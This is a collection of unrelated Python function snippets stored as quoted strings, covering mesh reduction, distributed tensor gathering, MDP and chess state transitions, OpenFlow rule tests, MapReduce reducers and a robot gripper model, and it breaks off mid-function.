"def reduceDegenerate(self,target=None):\n from elements import elementType\n if not hasattr(self,'eltype'):\n return [ self ]\n\n eltype = elementType(self.eltype)\n if not hasattr(eltype,'degenerate'):\n return [ self ]\n\n # get all reductions for this eltype\n strategies = eltype.degenerate\n\n # if target, keep only those leading to target\n if target is not None:\n s = strategies.get(target,[])\n if s:\n strategies = {target:s}\n else:\n strategies = {}\n\n if not strategies:\n return [self]\n\n\n e = self\n ML = []\n\n for totype in strategies:\n\n elems = []\n for conditions,selector in strategies[totype]:\n cond = array(conditions)\n w = (e[:,cond[:,0]] == e[:,cond[:,1]]).all(axis=1)\n sel = where(w)[0]\n if len(sel) > 0:\n elems.append(e[sel][:,selector])\n # remove the reduced elems from m\n e = e[~w]\n\n if e.nelems() == 0:\n break\n\n if elems:\n elems = concatenate(elems)\n ML.append(Connectivity(elems,eltype=totype))\n\n if e.nelems() == 0:\n break\n\n ML.append(e)\n\n return ML",
"def _dad_reduce_all_gather(self, act_tensor, grad_tensor, *args, **kw):\n act_gathered = [_torch.zeros_like(act_tensor) for _ in range(_dist.get_world_size())]\n grad_gathered = [_torch.zeros_like(grad_tensor) for _ in range(_dist.get_world_size())]\n\n _dist.all_gather(act_gathered, act_tensor)\n _dist.all_gather(grad_gathered, grad_tensor)\n\n act_gathered = _torch.cat(act_gathered)\n grad_gathered = _torch.cat(grad_gathered)\n\n return act_gathered, grad_gathered",
"def _call(self, k_spec):\n if \"reducer_type\" not in k_spec.keys():\n raise ValueError(\"Did not specify the type of the global descriptor reducer.\")\n if k_spec[\"reducer_type\"] == \"average\":\n return Atomic_2_Global_Average(k_spec)\n if k_spec[\"reducer_type\"] == \"sum\":\n return Atomic_2_Global_Sum(k_spec)\n if k_spec[\"reducer_type\"] == \"moment_average\":\n return Atomic_2_Global_Moment_Average(k_spec)\n if k_spec[\"reducer_type\"] == \"moment_sum\":\n return Atomic_2_Global_Moment_Sum(k_spec)\n else:\n raise NotImplementedError",
"def _dad_reduce_gather_broadcast(self, act_tensor, grad_tensor, dest=0, *args, **kw):\n act_gathered = [_torch.zeros_like(act_tensor) for _ in range(_dist.get_world_size())]\n grad_gathered = [_torch.zeros_like(grad_tensor) for _ in range(_dist.get_world_size())]\n\n \"\"\"Compression here\"\"\"\n _dist.gather(act_tensor, act_gathered if _dist.get_rank() == dest else None, dst=dest)\n _dist.gather(grad_tensor, grad_gathered if _dist.get_rank() == dest else None, dst=dest)\n\n act_gathered = _torch.cat(act_gathered)\n grad_gathered = _torch.cat(grad_gathered)\n\n _dist.broadcast(act_gathered, src=dest)\n _dist.broadcast(grad_gathered, src=dest)\n \"\"\"Decompression here\"\"\"\n\n return act_gathered, grad_gathered",
"def _successor(self, state: S, action: Action, *args, **kwargs) -> D:\n pass",
"def decodeSRaction(tree):\n # Start decoding\n post_nodelist = postorder_DFT(tree, [])\n # print len(post_nodelist)\n actionlist = []\n for node in post_nodelist:\n if (node.lnode is None) and (node.rnode is None):\n actionlist.append(('Shift', None, None))\n elif (node.lnode is not None) and (node.rnode is not None):\n form = node.form\n if (form == 'NN') or (form == 'NS'):\n relation = extractrelation(node.rnode.relation)\n else:\n relation = extractrelation(node.lnode.relation)\n actionlist.append(('Reduce', form, relation))\n else:\n raise ValueError(\"Can not decode Shift-Reduce action\")\n return actionlist",
"def reducer(functions, init_value):\n return reduce(lambda res, func: func(res), functions, init_value)",
"def pure2mixed(num_actions, action):\n mixed_action = np.zeros(num_actions)\n mixed_action[action] = 1\n return mixed_action",
"def _dediscretize_action(self, action):\n\n if self.discrete_input:\n\n discrete_m1 = action[0]\n discrete_m2 = action[1]\n\n\n m1 = 145 + discrete_m1 * 99/(self.num_div_action - 1)\n m2 = 145 + discrete_m2 * 99/(self.num_div_action - 1)\n\n else:\n if self.differential_car:\n # actions fron 0 to 24\n discrete_m1 = action//5\n discrete_m2 = action % 5\n\n m1 = 145 + discrete_m1 * 99/(self.num_div_action - 1)\n m2 = 145 + discrete_m2 * 99/(self.num_div_action - 1)\n\n else:\n discrete_m1 = action // 5\n discrete_m2 = action % 5\n\n # the traction engine of the ackerman car starts\n # working with pwm=180\n\n m1 = 180 + discrete_m1 * 74 / (self.num_div_action - 1)\n\n # it is the servo and goes from 0 to 255\n m2 = discrete_m2 * 255 / (self.num_div_action - 1)\n\n return m1, m2",
"def __call__(self):\n return self.reduce()",
"def local_cut_useless_reduce(node):\r\n if isinstance(node.op, T.CAReduce):\r\n summed, = node.inputs\r\n # if reduce were doing anything, the output ndim would be reduced\r\n if summed.type == node.outputs[0].type:\r\n return [summed]",
"def __reduce__(self):\r\n return (self.__class__, (self.func, self.cachedir, self.ignore,\r\n self.mmap_mode, self.compress, self._verbose))",
"def _merge_and_reduce(self, signals):\n\n if self.s_filter:\n\n signals = clean(signals,\n standardize=self.standardize,\n low_pass=self.low_pass,\n high_pass=self.high_pass,\n t_r=self.tr)\n \n return signals",
"def all_reduce(self):\n return {k: reduce_number(v) for k, v in self.items()}",
"def test_action_independence_multiple(self):\n DST1, DST2 = ('SET_FIELD', ('IPV4_DST', 0x1)), ('SET_FIELD', ('IPV4_DST', 0x2))\n SRC1, SRC2 = ('SET_FIELD', ('IPV4_SRC', 0x1)), ('SET_FIELD', ('IPV4_SRC', 0x2))\n OUT1, OUT2 = ('OUTPUT', 1), ('OUTPUT', 2)\n n1 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x0, 0xFFFFFFFE)]),\n instructions=inst_from_acts([DST1, SRC2, OUT1, DST2, SRC1, OUT2])),\n Rule(priority=0)\n ], match_redundancy=True)\n \"\"\"\n dst:1, src:2 -> output:1, dst:2, src:1, output:2\n dst:0/31 -> dst:1, src:2, output:1, dst:2, src:1, output:2\n \"\"\"\n n2 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 1, None),\n ('IPV4_SRC', 2, None)]),\n instructions=inst_from_acts([OUT1, DST2, SRC1, OUT2])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x0, 0xFFFFFFFE)]),\n instructions=inst_from_acts([DST1, SRC2, OUT1, DST2, SRC1, OUT2])),\n Rule(priority=0)\n ], match_redundancy=True)\n \"\"\"\n dst:1 -> src:2, output:1, dst:2, src:1, output:2\n dst:0/31 -> dst:1, src:2, output:1, dst:2, src:1, output:2\n \"\"\"\n n3 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 1, None)]),\n instructions=inst_from_acts([SRC2, OUT1, DST2, SRC1, OUT2])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x0, 0xFFFFFFFE)]),\n instructions=inst_from_acts([DST1, SRC2, OUT1, DST2, SRC1, OUT2])),\n Rule(priority=0)\n ], match_redundancy=True)\n\n self.assertTrue(check_equal(n1, n2))\n self.assertTrue(check_equal(n2, n3))\n self.assertTrue(check_equal(n1, n3))",
"def _rewrite_unary_default(self, node: saldag.UnaryOpNode):\n parent = next(iter(node.parents))\n if parent.is_mpc:\n # if node is leaf stop\n if node.is_leaf():\n node.is_mpc = True\n return\n # node is not leaf\n if isinstance(parent, saldag.Concat) and parent.is_boundary():\n push_op_node_down(parent, node)\n elif isinstance(parent, saldag.Aggregate) and self._do_commute(parent, node):\n agg_op = parent\n agg_parent = agg_op.parent\n if isinstance(agg_parent, saldag.Concat) and agg_parent.is_boundary():\n concat_op = agg_parent\n assert len(concat_op.children) == 1\n push_op_node_down(agg_op, node)\n updated_node = agg_op.parent\n push_op_node_down(concat_op, updated_node)\n else:\n node.is_mpc = True\n else:\n node.is_mpc = True\n else:\n pass",
"def test_was_produced_by_action(self):\n\n test_content = {\n AbstractAction.ACTION: WordExtraction.__name__,\n AbstractAction.RESULT: ['One', 'Two']\n }\n\n assert WordExtraction.produced(test_content)\n\n test_content[AbstractAction.ACTION] = ''\n\n assert not WordExtraction.produced(test_content)",
"def reducer(key, vals):\n count = 0\n for p in vals:\n count += 1\n mr.emit((key, count))",
"def resolve_conflicts(actions):\n\n # organize actions by discriminators\n unique = {}\n output = []\n for i, action in enumerate(actions):\n if not isinstance(action, dict):\n # old-style tuple action\n action = expand_action(*action)\n\n # \"order\" is an integer grouping. Actions in a lower order will be\n # executed before actions in a higher order. Within an order,\n # actions are executed sequentially based on original action ordering\n # (\"i\").\n order = action['order'] or 0\n discriminator = action['discriminator']\n\n # \"ainfo\" is a tuple of (order, i, action) where \"order\" is a\n # user-supplied grouping, \"i\" is an integer expressing the relative\n # position of this action in the action list being resolved, and\n # \"action\" is an action dictionary. The purpose of an ainfo is to\n # associate an \"order\" and an \"i\" with a particular action; \"order\"\n # and \"i\" exist for sorting purposes after conflict resolution.\n ainfo = (order, i, action)\n\n if discriminator is None:\n # The discriminator is None, so this action can never conflict.\n # We can add it directly to the result.\n output.append(ainfo)\n continue\n\n L = unique.setdefault(discriminator, []) # noqa\n L.append(ainfo)\n\n # Check for conflicts\n conflicts = {}\n\n for discriminator, ainfos in unique.items():\n\n # We use (order, i) as a sort key because we need to\n def byorder(ainfo):\n order, i = ainfo[0], ainfo[1]\n return order, i\n\n ainfos.sort(key=byorder)\n ainfo, rest = ainfos[0], ainfos[1:]\n output.append(ainfo)\n _, _, action = ainfo\n order = action['order']\n discriminator = action['discriminator']\n base_module_name = action['module_name']\n base_order = action['order']\n\n for _, _, action in rest:\n if action['order'] <= base_order:\n L = conflicts.setdefault(discriminator, [base_module_name, base_order]) # noqa\n L.append((action['module_name'], action['order']))\n\n if conflicts:\n raise ConfigurationConflictError(conflicts)\n\n # Sort conflict-resolved actions by (order, i) and return them.\n return [x[2] for x in sorted(output, key=operator.itemgetter(0, 1))]",
"def __reduce__(self):\n return (self.__class__, (self.getstate(),), self.__dict__)",
"def apply(self):",
"def get_deconz_actions_mapping(self) -> Optional[TypeActionsMapping]:\n return None",
"def __init__(self, reduce_func=np.mean, ndir=100, seed=None):\n self.__reduce_func = reduce_func\n self.__directions = None\n self.__seed = seed\n self.__ndir = ndir",
"def test_action_independence_single(self):\n SF1, OUT = ('SET_FIELD', ('IPV4_DST', 0x01010101)), ('OUTPUT', 6)\n DEC_TTL = ('DEC_NW_TTL', None)\n # 0.1.1.0/30 -> ip:1.1.1.1, output:1\n n1 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x01010100, 0xFFFFFFFE)]),\n instructions=inst_from_acts([SF1, OUT])),\n Rule(priority=0)\n ])\n # 1.1.1.1/32 -> output:1\n # 1.1.1.0/31 -> ip:1.1.1.1, output:1\n n2 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x01010101, None)]),\n instructions=inst_from_acts([OUT])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x01010100, 0xFFFFFFFE)]),\n instructions=inst_from_acts([SF1, OUT])),\n Rule(priority=0)\n ])\n # 1.1.1.0/32 -> ip:1.1.1.1, output1\n # 1.1.1.0/31 -> output:1\n n3 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x01010100, None)]),\n instructions=inst_from_acts([SF1, OUT])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x01010100, 0xFFFFFFFE)]),\n instructions=inst_from_acts([OUT])),\n Rule(priority=0)\n ])\n n4 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x01010101, None)]),\n instructions=inst_from_acts([OUT])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x01010100, 0xFFFFFFFE)]),\n instructions=inst_from_acts([DEC_TTL, SF1, OUT])),\n Rule(priority=0)\n ])\n self.assertTrue(check_equal(n1, n2))\n self.assertFalse(check_equal(n1, n4))\n self.assertTrue(check_equal(n2, n3))\n self.assertTrue(check_equal(n1, n3))",
"def duplicate_transition_ignore(old_transition, new_transition):\n return old_transition",
"def reduce(self, f, initial):\n self.append(Reducer(f, initial))\n return self",
"def make_accumulator():\n pass # replace with your solution",
"def apply(self) -> None:",
"def apply(self) -> None:",
"def on_sense_sonar(self, dist):\n raise NotImplementedError()",
"def make_rules(self, old_rules):\n rules = defaultdict(set)\n\n def recurse_disc_rule(attr, rule):\n \"\"\"\n Recursively partition multivalued discrete attributes if\n its worth it\n \"\"\"\n\n\n ro = RuleObj(rule,\n self.bad_err_funcs,\n self.good_err_funcs,\n self.bad_tables,\n self.good_tables)\n\n if not self.prune_rule(ro):\n return set([ro])\n \n c = rule.filter.conditions[0]\n var_type = rule.data.domain[c.position].var_type\n\n if (var_type == Orange.feature.Type.Discrete):\n if len(c.values) == 1:\n return [ro]\n \n refiner = BeamRefiner(attrs=[attr], fanout=10)\n ret = set()\n for _, newrule in refiner(rule):\n ret.update(recurse_disc_rule(attr, newrule))\n return ret\n else:\n if len(rule.data) < self.min_pts:\n return [ro]\n return [ro]\n\n # XXX: figure out this logic!\n\n refiner = BeamRefiner(attrs=[attr], fanout=2)\n ret = set()\n for _, newrule in refiner(rule):\n newro = RuleObj(newrule,\n self.bad_err_funcs,\n self.good_err_funcs,\n self.bad_tables,\n self.good_tables)\n ret.update(recurse_disc_rule(attr, newrule))\n\n \n if old_rules is None:\n base_rule = SDRule(self.full_table, None) \n refiner = BeamRefiner(attrs=self.cols, fanout=10)\n #refiner = BeamRefiner(attrs=['recipient_nm'], fanout=30) \n\n \n for attr, rule in refiner(base_rule):\n ros = recurse_disc_rule(attr, rule)\n #self.top_k({None:ros})\n ros = filter(self.prune_rule, ros)\n rules[(attr,)].update(ros)\n\n else:\n attrs = old_rules.keys()\n for a_idx, attr1 in enumerate(attrs):\n for attr2 in attrs[a_idx+1:]:\n merged_attrs = set(attr1).union(attr2)\n max_attrs_len = max(len(attr1), len(attr2))\n if len(merged_attrs) == max_attrs_len:\n continue\n \n \n a1rules, a2rules = old_rules[attr1], old_rules[attr2]\n\n for ro in self.merge_dims(a1rules, a2rules):\n key = ro.rule.attributes\n\n #self.top_k({None:(ro,)})\n if self.prune_rule(ro):\n rules[key].add(ro)\n \n return rules",
"def make_reducer_task_conf(self, taskid):\n return {\n 'jobid': self.id,\n 'taskid': taskid,\n 'reducer': self.reducer,\n 'output_dir': self.output_dir,\n 'inputs': [map_output(self.id, i, taskid) for i in \\\n range(self.cnt_mappers)]\n }",
"def apply(self):\n pass",
"def apply(self):\n pass",
"def __init__(self, reduce=True, one_side=False):\n self.reduce = reduce\n self.one_side = one_side",
"def computeActionFromValues(self, state):\n\n ##util.raiseNotDefined()\n #\"*** YOUR CODE STARTS HERE ***\"\n \n # Code to remove --- from here\n resultingAction = None\n if self.mdp.isTerminal(state):\n return resultingAction\n else:\n bestq = float(\"-inf\")\n actions = self.mdp.getPossibleActions(state)\n for action in actions:\n qvalue = self.computeQValueFromValues(state, action)\n if qvalue > bestq:\n bestq = qvalue\n resultingAction = action\n return resultingAction\n\n # Code to remove --- to here\n #\"*** YOUR CODE FINISHES HERE ***\"",
"def result(state, action):\n # Faster than deepcopy\n new_state = pickle.loads(pickle.dumps((state)))\n\n if action.castle == None:\n # Attacking En passant pawn\n if new_state.en_passant == action.end:\n new_state.board[action.start] = cc.NO_PIECE\n new_state.board[action.end] = action.piece\n # Delete black pawn\n if new_state.en_passant[0] == cc.RANK_6:\n down = (action.end[0]+1, action.end[1])\n new_state.board[down] = cc.NO_PIECE\n # Delete white pawn\n elif new_state.en_passant[0] == cc.RANK_3:\n up = (action.end[0]-1, action.end[1])\n new_state.board[up] = cc.NO_PIECE\n # Default Case\n else:\n # Delete piece from the start\n new_state.board[action.start] = \" \"\n # Place piece at the end\n new_state.board[action.end] = action.piece\n\n # Set en_passant space for a pawn moving 2\n if action.en_p:\n new_state.en_passant = cc.coord_to_alg(action.en_p)\n else:\n new_state.en_passant = cc.NO_C_EP\n\n # Remove castle availability if the rook or king move\n if action.piece == cc.W_ROOK:\n if action.start == (cc.RANK_1, cc.FILE_H):\n new_state.castles_avail = new_state.castles_avail.replace('K', '')\n elif action.start == (cc.RANK_1, cc.FILE_A):\n new_state.castles_avail = new_state.castles_avail.replace('Q', '')\n elif action.piece == cc.W_KING:\n if action.start == (cc.RANK_1, cc.FILE_E):\n new_state.castles_avail = new_state.castles_avail.replace('K', '')\n new_state.castles_avail = new_state.castles_avail.replace('Q', '')\n elif action.piece == cc.B_ROOK:\n if action.start == (cc.RANK_8, cc.FILE_H):\n new_state.castles_avail = new_state.castles_avail.replace('k', '')\n elif action.start == (cc.RANK_8, cc.FILE_A):\n new_state.castles_avail = new_state.castles_avail.replace('q', '')\n elif action.piece == cc.B_KING:\n if action.start == (cc.RANK_8, cc.FILE_E):\n new_state.castles_avail = new_state.castles_avail.replace('k', '')\n new_state.castles_avail = new_state.castles_avail.replace('q', '')\n\n # Update the halfmove count\n if action.capture or action.piece == cc.W_PAWN or action.piece == cc.B_PAWN:\n new_state.halfmove = 0\n else:\n new_state.halfmove += 1\n \n else: # Castle Time\n if action.castle == cc.CASTLE_QUEENSIDE:\n if state.active_color == cc.WHITE_ACTIVE:\n # Delete and Place Rook\n new_state.board[cc.RANK_1, cc.FILE_A] = \" \"\n new_state.board[cc.RANK_1, cc.FILE_D] = cc.W_ROOK\n # Delete and Place King\n new_state.board[cc.RANK_1, cc.FILE_E] = \" \"\n new_state.board[cc.RANK_1, cc.FILE_C] = cc.W_KING\n # Remove all White castling availability\n new_state.castles_avail = new_state.castles_avail.replace('K','')\n new_state.castles_avail = new_state.castles_avail.replace('Q','')\n # If the string is empty, replace with a dash\n if not new_state.castles_avail:\n new_state.castles_avail = cc.NO_C_EP\n elif state.active_color == cc.BLACK_ACTIVE:\n # Delete and Place Rook\n new_state.board[cc.RANK_8, cc.FILE_A] = \" \"\n new_state.board[cc.RANK_8, cc.FILE_D] = cc.B_ROOK\n # Delete and Place King\n new_state.board[cc.RANK_8, cc.FILE_E] = \" \"\n new_state.board[cc.RANK_8, cc.FILE_C] = cc.B_KING\n # Remove all Black castling availability\n new_state.castles_avail = new_state.castles_avail.replace('k','')\n new_state.castles_avail = new_state.castles_avail.replace('q','')\n # If the string is empty, replace with a dash\n if not new_state.castles_avail:\n new_state.castles_avail = cc.NO_C_EP\n\n elif action.castle == cc.CASTLE_KINGSIDE:\n if state.active_color == cc.WHITE_ACTIVE:\n # Delete and Place Rook\n new_state.board[cc.RANK_1, cc.FILE_H] = \" \"\n new_state.board[cc.RANK_1, cc.FILE_F] = cc.W_ROOK\n # Delete and Place King\n new_state.board[cc.RANK_1, cc.FILE_E] = \" \"\n new_state.board[cc.RANK_1, cc.FILE_G] = cc.W_KING\n # Remove all White castling availability\n new_state.castles_avail = new_state.castles_avail.replace('K','')\n new_state.castles_avail = new_state.castles_avail.replace('Q','')\n # If the string is empty, replace with a dash\n if not new_state.castles_avail:\n new_state.castles_avail = cc.NO_C_EP\n elif state.active_color == cc.BLACK_ACTIVE:\n # Delete and Place Rook\n new_state.board[cc.RANK_8, cc.FILE_H] = \" \"\n new_state.board[cc.RANK_8, cc.FILE_F] = cc.B_ROOK\n # Delete and Place King\n new_state.board[cc.RANK_8, cc.FILE_E] = \" \"\n new_state.board[cc.RANK_8, cc.FILE_G] = cc.B_KING\n # Remove all Black castling availability\n new_state.castles_avail = new_state.castles_avail.replace('k','')\n new_state.castles_avail = new_state.castles_avail.replace('q','')\n # If the string is empty, replace with a dash\n if not new_state.castles_avail:\n new_state.castles_avail = cc.NO_C_EP\n \n # Update fullmove count\n if new_state.active_color == cc.WHITE_ACTIVE:\n new_state.active_color = cc.BLACK_ACTIVE\n new_state.opp_color = cc.WHITE_ACTIVE\n else:\n new_state.active_color = cc.WHITE_ACTIVE\n new_state.opp_color = cc.BLACK_ACTIVE\n new_state.fullmove += 1\n\n new_state.active_king = new_state.find_king(new_state.active_color)\n new_state.inactive_king = new_state.find_king(new_state.opp_color)\n\n return new_state",
"def dj_reduce(self,tol=1.e-13):\n djs = self._dj_reducible_stages(tol=tol)\n if len(djs)>0:\n for stage in djs[::-1]:\n self._remove_stage(stage)\n return self",
"def _reduce(self) -> None:\n divisor = self._gcd(self._numerator, self._denominator)\n self._numerator = self._numerator // divisor\n self._denominator = self._denominator // divisor",
"def _visit(self, node, pre_action=None, post_action=None):\n self.color[node] = \"GREY\"\n self.distance[node] = 0\n self.parent[node] = None\n Q = Queue()\n Q.put(node) # node is GREY\n if pre_action: # when Q.put\n pre_action(node)\n while not Q.empty():\n source = Q.get()\n for edge in self.graph.iteroutedges(source):\n if self.color[edge.target] == \"WHITE\":\n self.color[edge.target] = \"GREY\"\n self.distance[edge.target] = self.distance[source] + 1\n self.parent[edge.target] = source\n self.dag.add_edge(edge)\n Q.put(edge.target) # target is GREY\n if pre_action: # when Q.put\n pre_action(edge.target)\n self.color[source] = \"BLACK\"\n if post_action: # source became BLACK\n post_action(source)",
"def overall_reduction(self):\n return 84",
"def _reduce_rep(self):\n for k, v in self.items():\n if not k:\n self[k] = 0\n for per1, per2 in pairwise(k):\n if per1 == per2:\n self[k] = 0\n super()._reduce_rep()",
"def transition(self, action: Action) -> D:\n if self.debug: print(f\"StateNode.transition({action.name})\")\n if self._transitions:\n if self._transitions[action]:\n if callable(self._transitions[action]):\n result = self._transitions[action](source=self, action=action)\n if action and not action.result: action.result = result\n return result\n else:\n result = self._transitions[action]\n if action and not action.result: action.result = result\n return result\n elif action and action.result:\n return action.result\n elif action and action.transform:\n return self._successor(action.transform(source=self, action=action), action)\n else:\n raise KeyError(action)",
"def __rshift__(self, other):\n if isinstance(other, self.accepted_plugs):\n self.connect(other)",
"def compact(self, distance=2):\n pass",
"def reduce_archive(self):\n distance_dict = dict()\n clusters = []\n for i, pop1 in enumerate(self.archive):\n clusters.append([pop1])\n for j in range(i + 1, len(self.archive)):\n pop2 = self.archive[j]\n distance_dict[(pop1, pop2)] = np.linalg.norm(pop1.objective_values - pop2.objective_values, 2)\n while len(clusters) > self.archive_size:\n min_distance = np.inf\n min_clusters = (np.nan, np.nan)\n for i, cluster1 in enumerate(clusters):\n for j in range(i + 1, len(clusters)):\n cluster2 = clusters[j]\n distance = SPEA.cluster_distance(cluster1, cluster2, distance_dict)\n if distance < min_distance:\n min_distance = distance\n min_clusters = (i, j)\n cluster1 = clusters.pop(max(min_clusters))\n cluster2 = clusters.pop(min(min_clusters))\n clusters.append(cluster1 + cluster2)\n self.archive = []\n for cluster in clusters:\n self.archive.append(self.cluster_centroid(cluster, distance_dict))",
"def default_action(self):\n pass",
"def __mul__(self, dist):\n return CombinedDistribution(self, dist, mul)",
"def main(rules, antecedent_prefix, consequent_prefix, deltas_prefix):\n _main(rules, antecedent_prefix, consequent_prefix, deltas_prefix)",
"def get_state_actions_mapping(self):\n return None",
"def process(self, *args, **kwargs):\n from copy import copy\n\n # set default values\n options = copy(self._process_default_options_)\n options.update(kwargs)\n\n condensed_output = (options['list_of_outputs'] is False and\n not options['full_output'])\n\n if condensed_output:\n options['list_of_outputs'] = True\n options['only_accepted'] = True\n\n result = super(Transducer, self).process(*args, **options)\n\n if (condensed_output and not result or\n not options['full_output'] and result is None):\n raise ValueError(\"Invalid input sequence.\")\n if condensed_output and len(result) >= 2:\n raise ValueError(\"Found more than one accepting path.\")\n\n if condensed_output:\n return result[0]\n return result",
"def combiner(x):\n return x",
"def feature_dist_func_dict():\n return {\"tanimoto_dissimilarity\": tanimoto_dissimilarity}",
"def choose_best_action(self, s):\r\n raise NotImplemented()",
"def _doReduce(self, func):\n name = \"Reducer\"\n sys.stderr.write(\"Master[%s phase]: starting\\n\" % name)\n proc = [mp.Process(target=spawn_reducer(func), name=name) for _ in range(self.num_workers)]\n for p in proc:\n p.daemon = True\n p.start()\n for p in proc:\n p.join()\n sys.stderr.write(\"Master[%s phase]: ended..\\n\" % name)",
"def step(self, node, default_action):\n actionToWeight = node.getActionToWeightMap()\n action = util.selectRandomKey(actionToWeight, default_action)\n return node.getSuccAfterExpand(action)",
"def state_encod_arch2(self, state, action):",
"def passivize(rule):\n rule[\"mother\"][\"subcat\"] = {\n \"obj\": None,\n \"preps\": {\n \"by\": [[\"*Subj\"]]}}\n\n rule[\"mother\"][\"hooks\"] = {\n \"head\": [\"*Obj\"]}\n\n rule[\"dtrs\"][0][\"subcat\"] = {\n \"obj\": [\"*Obj\"]}\n\n rule[\"dtrs\"][0][\"hooks\"] = {\n \"subj\": [\"*Subj\"]}\n\n return rule",
"def transition_function(state, action):\n results = []\n\n if action.action_type == Action.NOOP:\n results.append((state, 1.0))\n\n elif action.action_type == Action.GRASP:\n # point distribution for success mixed with point distribution for failure\n alpha = 0.8\n\n # success - gripper moves to object position and holds object\n success_state = deepcopy(state)\n obj = utils.get_object(success_state, action.name)\n if obj is None:\n alpha = 0\n else:\n gripper = utils.get_object(success_state, 'gripper')\n if obj.__class__ == Drawer:\n gripper.x = obj.x + (obj.width - 1)/2 + 1\n gripper.y = obj.y\n gripper.z = 2\n else:\n gripper.x = obj.x\n gripper.y = obj.y\n gripper.z = obj.z\n gripper.holding = obj.name\n gripper.closed = True\n\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n elif action.action_type == Action.PLACE:\n gripper = utils.get_object(state, 'gripper')\n new_z = utils.ray_trace(action.position.x, action.position.y)\n\n # point distribution for success mixed with point distribution for failure\n alpha = 0.8\n\n # success - gripper moves to place position and releases object\n success_state = deepcopy(state)\n obj = utils.gripper_object(success_state)\n gripper_move = utils.get_object(success_state, 'gripper')\n if obj is not None and obj.__class__ == Drawer:\n alpha = 0\n else:\n if obj is not None:\n if obj.__class__ == Container:\n obj.x = action.position.x + obj.x - gripper_move.x\n obj.y = action.position.y + obj.y - gripper_move.y\n else:\n obj.x = action.position.x\n obj.y = action.position.y\n obj.z = new_z\n gripper_move.x = action.position.x\n gripper_move.y = action.position.y\n gripper_move.z = new_z\n gripper_move.closed = False\n gripper_move.holding = ''\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n elif action.action_type == Action.OPEN_GRIPPER:\n gripper = utils.get_object(state, 'gripper')\n if not gripper.closed:\n results.append((state, 1.0))\n else:\n success_state = deepcopy(state)\n gripper = utils.get_object(state, 'gripper')\n gripper.closed = False\n obj = utils.gripper_object(success_state)\n if obj is None:\n results.append((success_state, 1.0))\n else:\n states = [success_state]\n probs = [1.0]\n prob_sum = 0\n decay = 1.0\n for z in range(obj.z - 1, -1, -1):\n decay *= 0.8\n if obj.__class__ == Item:\n for i in range(obj.z - z, obj.z + z + 1):\n for j in range(obj.z - z, obj.z + z + 1):\n states.append(utils.copy_state_move_object(success_state, obj.unique_name, i, j, z - obj.z))\n p = 1.0/(pow(2*(obj.z - z) + 1, 2))\n p *= decay\n probs.append(p)\n prob_sum += p\n elif obj.__class__ == Container:\n for i in range(int((obj.z - z)/2), int((obj.z + z)/2) + 1):\n for j in range(int((obj.z - z)/2), int((obj.z + z)/2) + 1):\n states.append(utils.copy_state_move_object(success_state, obj.unique_name, i, j, z - obj.z))\n p = 1.0/(pow(2*(int((obj.z - z)/2)) + 1, 2))\n p *= decay\n probs.append(p)\n prob_sum += p\n elif obj.__class__ == Lid:\n states.append(utils.copy_state_move_object(success_state, obj, 0, 0, z - obj.z))\n probs.append(decay)\n for i in range(len(probs)):\n probs[i] /= prob_sum\n results.extend(zip(states, probs))\n\n elif action.action_type == Action.CLOSE_GRIPPER:\n gripper = utils.get_object(state, 'gripper')\n if gripper.closed:\n results.append((state, 1.0))\n else:\n success_state = deepcopy(state)\n gripper = utils.get_object(state, 'gripper')\n gripper.closed = True\n if 'gripper_on_apple' and 'gripper_level_with_apple':\n gripper.holding = 'apple'\n results.append((success_state, 1.0))\n elif 'gripper_on_batteries' and 'gripper_level_with_batteries':\n gripper.holding = 'batteries'\n results.append((success_state, 1.0))\n elif 'gripper_on_flashlight' and 'gripper_level_with_flashlight':\n gripper.holding = 'flashlight'\n results.append((success_state, 1.0))\n elif 'gripper_on_granola' and 'gripper_level_with_granola':\n gripper.holding = 'granola'\n results.append((success_state, 1.0))\n elif 'gripper_on_knife' and 'gripper_level_with_knife':\n gripper.holding = 'knife'\n results.append((success_state, 1.0))\n elif 'gripper_on_small' and 'gripper_level_with_small':\n gripper.holding = 'small'\n results.append((success_state, 1.0))\n elif 'gripper_on_lid' and 'gripper_level_with_lid':\n failure_state = deepcopy(success_state)\n gripper.holding = 'lid'\n results.append((success_state, 0.1))\n results.append((failure_state, 0.9))\n elif 'gripper_touching_drawer' and 'gripper_right_of_drawer' and 'gripper_level_with_drawer':\n failure_state = deepcopy(success_state)\n gripper.holding = 'drawer'\n results.append((success_state, 0.2))\n results.append((failure_state, 0.8))\n elif 'gripper_on_large' and 'gripper_level_with_large':\n failure_state = deepcopy(success_state)\n gripper.holding = 'large'\n results.append((success_state, 0.875))\n results.append((failure_state, 0.125))\n\n elif action.action_type == Action.MOVE_ARM:\n pass\n\n elif action.action_type == Action.RAISE_ARM:\n alpha = 1.0\n gripper = utils.get_object(state, 'gripper')\n if 'gripper_on_lid' in state.relations and 'gripper_below_lid' in state.relations:\n alpha *= 0.8\n if 'gripper_on_drawer' in state.relations and 'gripper_below_drawer' in state.relations:\n alpha *= 0.8\n if 'gripper_on_stack' in state.relations and 'gripper_below_stack' in state.relations:\n alpha *= 0.8\n if 'gripper_on_small' in state.relations and 'gripper_below_small' in state.relations:\n alpha *= 0.8\n if 'gripper_on_large' in state.relations and 'gripper_below_large' in state.relations:\n alpha *= 0.8\n if gripper.holding in ['lid', 'small', 'large']:\n alpha *= 0.8\n success_state = deepcopy(state)\n gripper = utils.get_object(success_state, 'gripper')\n gripper.z += 1\n if gripper.z > 4:\n gripper.z = 4\n obj = utils.gripper_object(success_state)\n obj.z += 1\n if obj.z > 4:\n obj.z = 4\n results.append((success_state, alpha*1.0))\n\n # failure - no change\n results.append((state, (1 - alpha)*1.0))\n\n elif action.action_type == 